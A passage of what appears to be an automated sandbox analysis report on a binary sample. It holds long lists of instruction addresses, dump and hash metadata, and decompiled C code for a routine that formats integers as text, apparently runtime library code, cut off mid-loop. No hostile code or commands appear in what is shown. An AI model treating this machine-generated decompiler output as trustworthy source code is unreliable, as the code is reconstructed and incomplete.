    						 *(_t701 - 0x2c0) =  *(_t701 - 0x2b8);
    						 *(_t701 - 0x2bc) =  *(_t701 - 0x2b4);
    						goto L171;
    					}
    				}
    			}




























    0x00b9574c
    0x00b9574c
    0x00b9574c
    0x00b9574c
    0x00b9575c
    0x00b9575e
    0x00b95761
    0x00b95761
    0x00b95767
    0x00b95767
    0x00b9576a
    0x00b9576a
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b9582a
    0x00b9582f
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580f
    0x00b95814
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e9
    0x00b957ee
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957cd
    0x00b957d2
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b957a0
    0x00b957a5
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95778
    0x00b9577d
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00b95848
    0x00b95848
    0x00b9584f
    0x00000000
    0x00000000
    0x00b95851
    0x00b95851
    0x00b9585c
    0x00b9586a
    0x00b9586f
    0x00b95875
    0x00b95883
    0x00b958a0
    0x00b958a3
    0x00b958a8
    0x00b958ad
    0x00b958b3
    0x00b958c1
    0x00b958c1
    0x00b958ca
    0x00b958ca
    0x00b958b3
    0x00b958d0
    0x00b958d4
    0x00b958e5
    0x00b958e8
    0x00b958ef
    0x00b958f1
    0x00b958f1
    0x00b958d6
    0x00b958d6
    0x00b958d6
    0x00b958fe
    0x00b95904
    0x00b95906
    0x00b95906
    0x00b95910
    0x00b95913
    0x00b95913
    0x00b95919
    0x00b9591c
    0x00b9591f
    0x00b95921
    0x00000000
    0x00000000
    0x00b95923
    0x00b95929
    0x00b9592f
    0x00b959ac
    0x00b959b2
    0x00b959bb
    0x00b959c1
    0x00b959c7
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00b959fc
    0x00b959ff
    0x00b95a02
    0x00b95a07
    0x00b95a0c
    0x00b95a1e
    0x00b95a21
    0x00b95a33
    0x00b95a36
    0x00b95a38
    0x00b95a3c
    0x00b95a3c
    0x00b95a23
    0x00b95a23
    0x00b95a27
    0x00b95a27
    0x00b95a0e
    0x00b95a0e
    0x00b95a12
    0x00b95a12
    0x00b95a0c
    0x00b95a4c
    0x00b95a55
    0x00b95a58
    0x00b95a6e
    0x00b95a73
    0x00b95a73
    0x00b95a89
    0x00b95a8e
    0x00b95a94
    0x00b95a97
    0x00b95a9c
    0x00b95a9f
    0x00b95ab5
    0x00b95aba
    0x00b95aba
    0x00b95a9f
    0x00b95abd
    0x00b95ac1
    0x00b95b95
    0x00b95ba8
    0x00b95bad
    0x00000000
    0x00b95ac7
    0x00b95ac7
    0x00b95ac7
    0x00b95acb
    0x00000000
    0x00000000
    0x00b95ad1
    0x00b95ad1
    0x00b95ade
    0x00b95ae7
    0x00b95aed
    0x00b95aed
    0x00b95afc
    0x00b95b02
    0x00b95b04
    0x00000000
    0x00000000
    0x00b95b0a
    0x00b95b13
    0x00b95b32
    0x00b95b37
    0x00b95b3a
    0x00b95b49
    0x00b95b4f
    0x00b95b56
    0x00b95b61
    0x00b95b61
    0x00000000
    0x00b95b61
    0x00b95b58
    0x00b95b58
    0x00b95b5f
    0x00b95b6d
    0x00b95b86
    0x00b95b8b
    0x00000000
    0x00b95b8b
    0x00000000
    0x00b95b5f
    0x00b95b93
    0x00b95bb0
    0x00b95bb0
    0x00b95bb7
    0x00b95bbc
    0x00b95bbf
    0x00b95bd5
    0x00b95bda
    0x00b95bda
    0x00b95bbf
    0x00b95bb7
    0x00b95bdd
    0x00b95bdd
    0x00b95be1
    0x00b95be9
    0x00b95bee
    0x00b95bf1
    0x00b95bf1
    0x00b95bf8
    0x00b95bf8
    0x00b94ccf
    0x00b94cd5
    0x00b94ce2
    0x00b94ce7
    0x00000000
    0x00b94cfa
    0x00b94d04
    0x00b94d2b
    0x00b94d12
    0x00b94d23
    0x00b94d23
    0x00b94d04
    0x00b94d35
    0x00b94d3b
    0x00b94d47
    0x00b94d4a
    0x00b94d58
    0x00b94d5b
    0x00b94d68
    0x00b94e0d
    0x00b94e13
    0x00b94e19
    0x00b94e20
    0x00000000
    0x00000000
    0x00b94e26
    0x00b94e2c
    0x00000000
    0x00b94e33
    0x00b94e33
    0x00b94e4b
    0x00b94e50
    0x00b94e53
    0x00b94e55
    0x00b94f0f
    0x00b94f22
    0x00b94f27
    0x00000000
    0x00b94e5b
    0x00b94e6e
    0x00b94e73
    0x00b94e79
    0x00b94e7b
    0x00b94e84
    0x00b94e84
    0x00b94e87
    0x00b94e93
    0x00b94e97
    0x00b94e9d
    0x00b94e9f
    0x00b94ea4
    0x00b94ea6
    0x00b94eab
    0x00b94eb0
    0x00b94eb2
    0x00b94eb7
    0x00b94eba
    0x00b94ebd
    0x00b94ebf
    0x00b94ebf
    0x00b94ebd
    0x00b94ec0
    0x00b94ec0
    0x00b94ec7
    0x00000000
    0x00b94ec9
    0x00b94ece
    0x00b94eea
    0x00b94ef2
    0x00b94eff
    0x00b94f04
    0x00000000
    0x00b94f04
    0x00b94ec7
    0x00000000
    0x00b94f2f
    0x00b94f2f
    0x00b94f36
    0x00b94f39
    0x00b94f3c
    0x00b94f3f
    0x00b94f42
    0x00b94f45
    0x00b94f48
    0x00b94f4f
    0x00b94f56
    0x00000000
    0x00000000
    0x00b94f62
    0x00b94f62
    0x00b94f69
    0x00b94f75
    0x00b94f78
    0x00b94f7e
    0x00b94f85
    0x00000000
    0x00000000
    0x00b94f87
    0x00b94f87
    0x00b94f8d
    0x00b94f8d
    0x00b94f94
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b94fd7
    0x00b94fd7
    0x00b94fde
    0x00b94fe1
    0x00b9500b
    0x00b9500e
    0x00b9500e
    0x00b95011
    0x00b95018
    0x00b95018
    0x00b9501c
    0x00b94fe3
    0x00b94fe3
    0x00b94fef
    0x00b94ff2
    0x00b94ff6
    0x00b94ff8
    0x00b94ffb
    0x00b94ffb
    0x00b94ffe
    0x00b95004
    0x00b95006
    0x00b95006
    0x00b95009
    0x00000000
    0x00000000
    0x00b95024
    0x00b95024
    0x00000000
    0x00000000
    0x00b95030
    0x00b95030
    0x00b95037
    0x00b9503a
    0x00b9505a
    0x00b9505d
    0x00b9505d
    0x00b95067
    0x00b95067
    0x00b9506b
    0x00b9503c
    0x00b9503c
    0x00b95048
    0x00b9504b
    0x00b9504f
    0x00b95051
    0x00b95051
    0x00b95058
    0x00000000
    0x00000000
    0x00b95073
    0x00b95073
    0x00b9507a
    0x00b95086
    0x00b95089
    0x00b9508f
    0x00b95096
    0x00b951a9
    0x00000000
    0x00b951a9
    0x00b9509c
    0x00b9509c
    0x00b950a2
    0x00b950a2
    0x00b950a9
    0x00000000
    0x00b950df
    0x00b950df
    0x00b950e2
    0x00b950e5
    0x00b950e8
    0x00b95110
    0x00b95110
    0x00b95113
    0x00b95116
    0x00b95119
    0x00b9513e
    0x00b9513e
    0x00b95141
    0x00b95144
    0x00b95147
    0x00b95180
    0x00b95191
    0x00000000
    0x00b95191
    0x00b95149
    0x00b95149
    0x00b9514c
    0x00b9514f
    0x00b95152
    0x00000000
    0x00000000
    0x00b95154
    0x00b95154
    0x00b95157
    0x00b9515a
    0x00b9515d
    0x00000000
    0x00000000
    0x00b9515f
    0x00b9515f
    0x00b95162
    0x00b95165
    0x00b95168
    0x00000000
    0x00000000
    0x00b9516a
    0x00b9516a
    0x00b9516d
    0x00b95170
    0x00b95173
    0x00000000
    0x00000000
    0x00b95175
    0x00b95175
    0x00b95178
    0x00b9517b
    0x00b9517e
    0x00b95182
    0x00000000
    0x00b95182
    0x00000000
    0x00b9517e
    0x00b9511b
    0x00b9511b
    0x00b9511e
    0x00b95122
    0x00b95125
    0x00000000
    0x00b95127
    0x00b9512a
    0x00b9512d
    0x00b95130
    0x00b95133
    0x00b95139
    0x00000000
    0x00b95139
    0x00b95125
    0x00b950ea
    0x00b950ea
    0x00b950ed
    0x00b950f1
    0x00b950f4
    0x00000000
    0x00b950f6
    0x00b950f9
    0x00b950fc
    0x00b950ff
    0x00b95102
    0x00b95108
    0x00000000
    0x00b95108
    0x00000000
    0x00b95193
    0x00b95196
    0x00b95199
    0x00000000
    0x00000000
    0x00b950b0
    0x00b950b0
    0x00b950b3
    0x00b950b6
    0x00b950b9
    0x00b950d1
    0x00b950d4
    0x00b950d4
    0x00b950d7
    0x00b950bb
    0x00b950be
    0x00b950c1
    0x00b950c7
    0x00b950cc
    0x00b950cc
    0x00000000
    0x00000000
    0x00b9519e
    0x00b9519e
    0x00b951a1
    0x00b951a1
    0x00b951a6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b951ae
    0x00b951ae
    0x00b951b5
    0x00b951c1
    0x00b951c4
    0x00b951ca
    0x00b951d1
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00b951d7
    0x00b951dd
    0x00b951dd
    0x00b951e4
    0x00000000
    0x00b9553e
    0x00b9553e
    0x00b95545
    0x00b9554c
    0x00b9554c
    0x00b9554f
    0x00000000
    0x00000000
    0x00b951eb
    0x00b951ee
    0x00b951ee
    0x00b951f4
    0x00b951f6
    0x00b951f9
    0x00b951f9
    0x00b951fe
    0x00b951fe
    0x00000000
    0x00000000
    0x00b9532b
    0x00b9532e
    0x00b9532e
    0x00b95333
    0x00b95335
    0x00b95338
    0x00b95338
    0x00b9533e
    0x00b9533e
    0x00000000
    0x00000000
    0x00b9570b
    0x00b9570b
    0x00000000
    0x00000000
    0x00b95295
    0x00b95295
    0x00b952a1
    0x00b952a7
    0x00b952ae
    0x00b952bc
    0x00b952bc
    0x00b952c2
    0x00b952c5
    0x00b952d1
    0x00b95326
    0x00000000
    0x00b95326
    0x00b952b0
    0x00b952b0
    0x00b952b6
    0x00b952ba
    0x00b952d6
    0x00b952d9
    0x00b952d9
    0x00b952df
    0x00b95307
    0x00b9530e
    0x00b95314
    0x00b95317
    0x00b9531a
    0x00b95320
    0x00b95323
    0x00b952e1
    0x00b952e1
    0x00b952e7
    0x00b952ea
    0x00b952ed
    0x00b952f3
    0x00b952f6
    0x00b952f9
    0x00b952fb
    0x00b952fe
    0x00b952fe
    0x00000000
    0x00b952df
    0x00000000
    0x00000000
    0x00b95555
    0x00b95558
    0x00b9555b
    0x00b9555e
    0x00b95564
    0x00b95567
    0x00b9556e
    0x00b95572
    0x00b9557d
    0x00b9557d
    0x00b95581
    0x00b95598
    0x00b95598
    0x00b9559f
    0x00b955a1
    0x00b955a1
    0x00b955a8
    0x00b955a8
    0x00b955af
    0x00b955c0
    0x00b955cf
    0x00b955d2
    0x00b955d6
    0x00b955ec
    0x00b955d8
    0x00b955d8
    0x00b955db
    0x00b955e1
    0x00b955e7
    0x00b955e7
    0x00b955d6
    0x00b955f6
    0x00b955f9
    0x00b955fc
    0x00b955ff
    0x00b95602
    0x00b95605
    0x00b9560b
    0x00b95611
    0x00b95619
    0x00b9561a
    0x00b9561d
    0x00b9561e
    0x00b95621
    0x00b95622
    0x00b95629
    0x00b9562a
    0x00b9562d
    0x00b9562e
    0x00b95631
    0x00b95632
    0x00b95638
    0x00b95639
    0x00b95647
    0x00b95649
    0x00b9564f
    0x00b9564f
    0x00b95655
    0x00b95657
    0x00b9565b
    0x00b9565d
    0x00b95665
    0x00b95666
    0x00b95669
    0x00b9566a
    0x00b95678
    0x00b9567a
    0x00b9567a
    0x00b9565b
    0x00b9567d
    0x00b95684
    0x00b95687
    0x00b9568c
    0x00b9568c
    0x00b95692
    0x00b95694
    0x00b9569c
    0x00b9569d
    0x00b956a0
    0x00b956a1
    0x00b956b0
    0x00b956b2
    0x00b956b2
    0x00b95692
    0x00b956b5
    0x00b956b8
    0x00b956bb
    0x00b956be
    0x00b956c3
    0x00b956c9
    0x00b956cc
    0x00b956cf
    0x00b956cf
    0x00b956d2
    0x00b956d2
    0x00b956d5
    0x00b956e1
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00b959f2
    0x00b95583
    0x00b95583
    0x00b9558a
    0x00b9558d
    0x00000000
    0x00000000
    0x00b9558f
    0x00b9558f
    0x00000000
    0x00b9558f
    0x00b95574
    0x00b95574
    0x00000000
    0x00000000
    0x00b95201
    0x00b95204
    0x00b95204
    0x00b9520a
    0x00b95265
    0x00b9526d
    0x00b95274
    0x00b9527a
    0x00b95280
    0x00b9520c
    0x00b9520c
    0x00b95216
    0x00b9521a
    0x00b95222
    0x00b95229
    0x00b95236
    0x00b9523d
    0x00b95249
    0x00b9524f
    0x00b95256
    0x00b95258
    0x00b95258
    0x00b9525f
    0x00b95287
    0x00b9528d
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00b956e9
    0x00b956ec
    0x00b956ef
    0x00b956f2
    0x00b9576a
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b9582a
    0x00b9582f
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580f
    0x00b95814
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e9
    0x00b957ee
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957cd
    0x00b957d2
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b957a0
    0x00b957a5
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95778
    0x00b9577d
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00000000
    0x00b95447
    0x00b95447
    0x00b95453
    0x00b95459
    0x00b9545e
    0x00b95460
    0x00b9550a
    0x00b9550d
    0x00b9550d
    0x00b95510
    0x00b95524
    0x00b9552a
    0x00b95530
    0x00b95512
    0x00b95512
    0x00b9551f
    0x00b9551f
    0x00b95532
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00b95466
    0x00b95466
    0x00b95466
    0x00b95468
    0x00b95476
    0x00b9546a
    0x00b9546a
    0x00b9546a
    0x00b95480
    0x00b95486
    0x00b9548c
    0x00b95493
    0x00b95495
    0x00b9549a
    0x00b9549c
    0x00b954a1
    0x00b954a6
    0x00b954a8
    0x00b954ad
    0x00b954b0
    0x00b954b3
    0x00b954b5
    0x00b954b5
    0x00b954b3
    0x00b954b6
    0x00b954bd
    0x00b95505
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b954bf
    0x00b954bf
    0x00b954c4
    0x00b954e0
    0x00b954e8
    0x00b954f2
    0x00b954f5
    0x00b954fa
    0x00000000
    0x00b954fa
    0x00000000
    0x00000000
    0x00000000
    0x00b95704
    0x00b95704
    0x00000000
    0x00000000
    0x00b95341
    0x00b95341
    0x00b95345
    0x00b95353
    0x00b95356
    0x00b95347
    0x00b95347
    0x00b95347
    0x00b9535c
    0x00b95362
    0x00b95368
    0x00b95374
    0x00b9537a
    0x00b9537a
    0x00b95380
    0x00b953e7
    0x00b953e7
    0x00b953eb
    0x00b953ed
    0x00b953f3
    0x00b953f3
    0x00b953f6
    0x00b953f9
    0x00b953ff
    0x00b953ff
    0x00b953ff
    0x00b9540b
    0x00b9540e
    0x00b95414
    0x00b95416
    0x00000000
    0x00000000
    0x00b95418
    0x00b95418
    0x00b9541e
    0x00b95421
    0x00b95423
    0x00000000
    0x00000000
    0x00b95425
    0x00b9542b
    0x00b9542e
    0x00b9542e
    0x00b95436
    0x00b95436
    0x00b9543c
    0x00b9543c
    0x00b9543f
    0x00000000
    0x00b95382
    0x00b95382
    0x00b95382
    0x00b95386
    0x00b95388
    0x00b9538d
    0x00b9538d
    0x00b95390
    0x00b95397
    0x00b9539a
    0x00b953a0
    0x00b953a0
    0x00b953a0
    0x00b953ac
    0x00b953af
    0x00b953b5
    0x00b953b7
    0x00000000
    0x00000000
    0x00b953b9
    0x00b953b9
    0x00b953bf
    0x00b953c2
    0x00b953c4
    0x00000000
    0x00000000
    0x00b953c6
    0x00b953cc
    0x00b953cf
    0x00b953cf
    0x00b953d7
    0x00b953dd
    0x00b953e0
    0x00b953e2
    0x00b95442
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00000000
    0x00b956fb
    0x00b956fb
    0x00b9576a
    0x00b9576a
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b9582a
    0x00b9582f
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580f
    0x00b95814
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e9
    0x00b957ee
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957cd
    0x00b957d2
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b957a0
    0x00b957a5
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95778
    0x00b9577d
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00000000
    0x00b95846
    0x00000000
    0x00b95717
    0x00b95717
    0x00b95721
    0x00b95721
    0x00b9572b
    0x00b9572b
    0x00b95731
    0x00b95733
    0x00b9573d
    0x00b9573d
    0x00b95740
    0x00b95743
    0x00b95743
    0x00b9576a
    0x00b9576a
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b9582a
    0x00b9582f
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580f
    0x00b95814
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e9
    0x00b957ee
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957cd
    0x00b957d2
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b957a0
    0x00b957a5
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95778
    0x00b9577d
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00000000
    0x00b95846
    0x00000000
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00000000
    0x00b94fb1
    0x00b94fb4
    0x00b94fb7
    0x00000000
    0x00000000
    0x00b94fbc
    0x00b94fbf
    0x00b94fc4
    0x00000000
    0x00000000
    0x00b94fa6
    0x00b94fa6
    0x00b94fa9
    0x00b94fac
    0x00000000
    0x00000000
    0x00b94f9b
    0x00b94f9e
    0x00b94fa1
    0x00000000
    0x00000000
    0x00b94fc9
    0x00b94fc9
    0x00b94fcc
    0x00b94fcc
    0x00b94fcf
    0x00000000
    0x00000000
    0x00b94fd2
    0x00000000
    0x00000000
    0x00b94d6e
    0x00b94d70
    0x00b94d7e
    0x00b94d72
    0x00b94d72
    0x00b94d72
    0x00b94d88
    0x00b94d8e
    0x00b94d9b
    0x00b94d9d
    0x00b94da2
    0x00b94da4
    0x00b94da9
    0x00b94dae
    0x00b94db0
    0x00b94db5
    0x00b94dbb
    0x00b94dbd
    0x00b94dbd
    0x00b94dbb
    0x00b94dbe
    0x00b94dc5
    0x00000000
    0x00b94dc7
    0x00b94dcc
    0x00b94de8
    0x00b94df0
    0x00b94dfd
    0x00b94e02
    0x00b95cc1
    0x00b95cce
    0x00b95cce
    0x00b94dc5
    0x00b94d68
    0x00b95bfd
    0x00b95bfd
    0x00b95c04
    0x00b95c1b
    0x00b95c1b
    0x00b95c25
    0x00b95c25
    0x00b95c2b
    0x00b95c31
    0x00b95c38
    0x00b95c3a
    0x00b95c3f
    0x00b95c41
    0x00b95c46
    0x00b95c4b
    0x00b95c4d
    0x00b95c52
    0x00b95c55
    0x00b95c58
    0x00b95c5a
    0x00b95c5a
    0x00b95c58
    0x00b95c5b
    0x00b95c62
    0x00b95cad
    0x00b95cb6
    0x00b95cbb
    0x00b95c64
    0x00b95c69
    0x00b95c85
    0x00b95c8d
    0x00b95c9a
    0x00b95c9f
    0x00b95c9f
    0x00000000
    0x00b95c62
    0x00b95c06
    0x00b95c06
    0x00b95c0d
    0x00000000
    0x00000000
    0x00b95c0f
    0x00b95c0f
    0x00000000
    0x00b95c0f
    0x00b959f2
    0x00b959c9
    0x00b959c9
    0x00b959cd
    0x00b959da
    0x00b959e0
    0x00b959e6
    0x00b959ec
    0x00b959ec
    0x00b959ef
    0x00000000
    0x00b959ef
    0x00b959cf
    0x00b959d5
    0x00b959d8
    0x00000000
    0x00000000
    0x00000000
    0x00b959d8
    0x00b95931
    0x00b95934
    0x00b9593e
    0x00b9594d
    0x00b95956
    0x00b9596c
    0x00b95972
    0x00b95978
    0x00b9597f
    0x00b95987
    0x00b95987
    0x00b9598d
    0x00b9598d
    0x00b9599c
    0x00b959a4
    0x00b95913
    0x00b95919
    0x00b9591c
    0x00b9591f
    0x00b95921
    0x00000000
    0x00000000
    0x00000000
    0x00b95921
    0x00b95913
    0x00b95853
    0x00b95853
    0x00b9585a
    0x00000000
    0x00000000
    0x00000000
    0x00b95888
    0x00b9588e
    0x00b9589a
    0x00000000
    0x00b9589a
    0x00b9576a

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __aulldiv__aullrem_get_int64_arg
    • String ID: 9
    • API String ID: 3120068967-2366072709
    • Opcode ID: fd4587fb2f8e775bb025d6734400d9a3ed1e761dc3a0f379bdc890fdbdae4637
    • Instruction ID: 4fcf449023765c23f5b774f01be30ff4b939a662f452858b222fe15cdff68418
    • Opcode Fuzzy Hash: fd4587fb2f8e775bb025d6734400d9a3ed1e761dc3a0f379bdc890fdbdae4637
    • Instruction Fuzzy Hash: 7F41ACB1D15A29DFEF25CB58C889BAEB7B5FB84300F2485E8D059A7240D7349A81CF50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E00B96A6D(signed int __edx) {
    				signed int _t483;
    				signed int _t502;
    				void* _t507;
    				signed int _t509;
    				void* _t517;
    				void* _t535;
    				intOrPtr _t539;
    				signed int _t556;
    				signed short _t557;
    				signed int _t560;
    				signed int _t563;
    				signed int _t564;
    				intOrPtr _t565;
    				signed int _t619;
    				signed int _t621;
    				signed int _t623;
    				signed int _t630;
    				signed int _t642;
    				signed int _t669;
    				intOrPtr _t670;
    				intOrPtr _t671;
    				signed int _t672;
    				void* _t674;
    				void* _t675;
    				signed int _t681;
    
    				L0:
    				while(1) {
    					L0:
    					_t619 = __edx;
    					 *(_t672 - 8) = 0xa;
    					L150:
    					while(1) {
    						L150:
    						while(1) {
    							L150:
    							while(1) {
    								L150:
    								if(( *(_t672 - 0x10) & 0x00008000) == 0) {
    									_t621 =  *(_t672 - 0x10) & 0x00001000;
    									if(_t621 == 0) {
    										if(( *(_t672 - 0x10) & 0x00000020) == 0) {
    											_t623 =  *(_t672 - 0x10) & 0x00000040;
    											if(_t623 == 0) {
    												_t483 = E00B93D50(_t672 + 0x14);
    												_t675 = _t674 + 4;
    												 *(_t672 - 0x4a0) = _t483;
    												 *(_t672 - 0x49c) = 0;
    											} else {
    												_t556 = E00B93D50(_t672 + 0x14);
    												_t675 = _t674 + 4;
    												asm("cdq");
    												 *(_t672 - 0x4a0) = _t556;
    												 *(_t672 - 0x49c) = _t623;
    											}
    										} else {
    											_t669 =  *(_t672 - 0x10) & 0x00000040;
    											if(_t669 == 0) {
    												_t557 = E00B93D50(_t672 + 0x14);
    												_t675 = _t674 + 4;
    												asm("cdq");
    												 *(_t672 - 0x4a0) = _t557 & 0x0000ffff;
    												 *(_t672 - 0x49c) = _t669;
    											} else {
    												_t560 = E00B93D50(_t672 + 0x14);
    												_t675 = _t674 + 4;
    												asm("cdq");
    												 *(_t672 - 0x4a0) = _t560;
    												 *(_t672 - 0x49c) = _t669;
    											}
    										}
    									} else {
    										_t563 = E00B93D70(_t672 + 0x14);
    										_t675 = _t674 + 4;
    										 *(_t672 - 0x4a0) = _t563;
    										 *(_t672 - 0x49c) = _t621;
    									}
    								} else {
    									_t564 = E00B93D70(_t672 + 0x14);
    									_t675 = _t674 + 4;
    									 *(_t672 - 0x4a0) = _t564;
    									 *(_t672 - 0x49c) = _t619;
    								}
    								if(( *(_t672 - 0x10) & 0x00000040) == 0) {
    									L167:
    									 *(_t672 - 0x4a8) =  *(_t672 - 0x4a0);
    									 *(_t672 - 0x4a4) =  *(_t672 - 0x49c);
    									goto L168;
    								} else {
    									L163:
    									_t681 =  *(_t672 - 0x49c);
    									if(_t681 > 0 || _t681 >= 0 &&  *(_t672 - 0x4a0) >= 0) {
    										goto L167;
    									} else {
    										L166:
    										asm("adc edx, 0x0");
    										 *(_t672 - 0x4a8) =  ~( *(_t672 - 0x4a0));
    										 *(_t672 - 0x4a4) =  ~( *(_t672 - 0x49c));
    										 *(_t672 - 0x10) =  *(_t672 - 0x10) | 0x00000100;
    										L168:
    										if(( *(_t672 - 0x10) & 0x00008000) == 0 && ( *(_t672 - 0x10) & 0x00001000) == 0) {
    											 *(_t672 - 0x4a4) =  *(_t672 - 0x4a4) & 0x00000000;
    										}
    										if( *(_t672 - 0x30) >= 0) {
    											 *(_t672 - 0x10) =  *(_t672 - 0x10) & 0xfffffff7;
    											if( *(_t672 - 0x30) > 0x200) {
    												 *(_t672 - 0x30) = 0x200;
    											}
    										} else {
    											 *(_t672 - 0x30) = 1;
    										}
    										if(( *(_t672 - 0x4a8) |  *(_t672 - 0x4a4)) == 0) {
    											 *(_t672 - 0x1c) = 0;
    										}
    										 *((intOrPtr*)(_t672 - 4)) = _t672 - 0x249;
    										while(1) {
    											L178:
    											_t629 =  *(_t672 - 0x30) - 1;
    											 *(_t672 - 0x30) =  *(_t672 - 0x30) - 1;
    											if( *(_t672 - 0x30) <= 0 && ( *(_t672 - 0x4a8) |  *(_t672 - 0x4a4)) == 0) {
    												break;
    											}
    											L180:
    											asm("cdq");
    											_t630 =  *(_t672 - 0x4a8);
    											 *((intOrPtr*)(_t672 - 0x494)) = E00B855B0(_t630,  *(_t672 - 0x4a4),  *(_t672 - 8), _t629) + 0x30;
    											asm("cdq");
    											 *(_t672 - 0x4a8) = E00B85630( *(_t672 - 0x4a8),  *(_t672 - 0x4a4),  *(_t672 - 8), _t630);
    											 *(_t672 - 0x4a4) = _t630;
    											if( *((intOrPtr*)(_t672 - 0x494)) > 0x39) {
    												 *((intOrPtr*)(_t672 - 0x494)) =  *((intOrPtr*)(_t672 - 0x494)) +  *((intOrPtr*)(_t672 - 0x460));
    											}
    											 *((char*)( *((intOrPtr*)(_t672 - 4)))) =  *((intOrPtr*)(_t672 - 0x494));
    											 *((intOrPtr*)(_t672 - 4)) =  *((intOrPtr*)(_t672 - 4)) - 1;
    										}
    										L183:
    										 *((intOrPtr*)(_t672 - 0x24)) = _t672 - 0x249 -  *((intOrPtr*)(_t672 - 4));
    										 *((intOrPtr*)(_t672 - 4)) =  *((intOrPtr*)(_t672 - 4)) + 1;
    										if(( *(_t672 - 0x10) & 0x00000200) != 0 && ( *((intOrPtr*)(_t672 - 0x24)) == 0 ||  *((char*)( *((intOrPtr*)(_t672 - 4)))) != 0x30)) {
    											 *((intOrPtr*)(_t672 - 4)) =  *((intOrPtr*)(_t672 - 4)) - 1;
    											 *((char*)( *((intOrPtr*)(_t672 - 4)))) = 0x30;
    											 *((intOrPtr*)(_t672 - 0x24)) =  *((intOrPtr*)(_t672 - 0x24)) + 1;
    										}
    										L187:
    										while(1) {
    											L187:
    											while(1) {
    												L187:
    												while(1) {
    													L187:
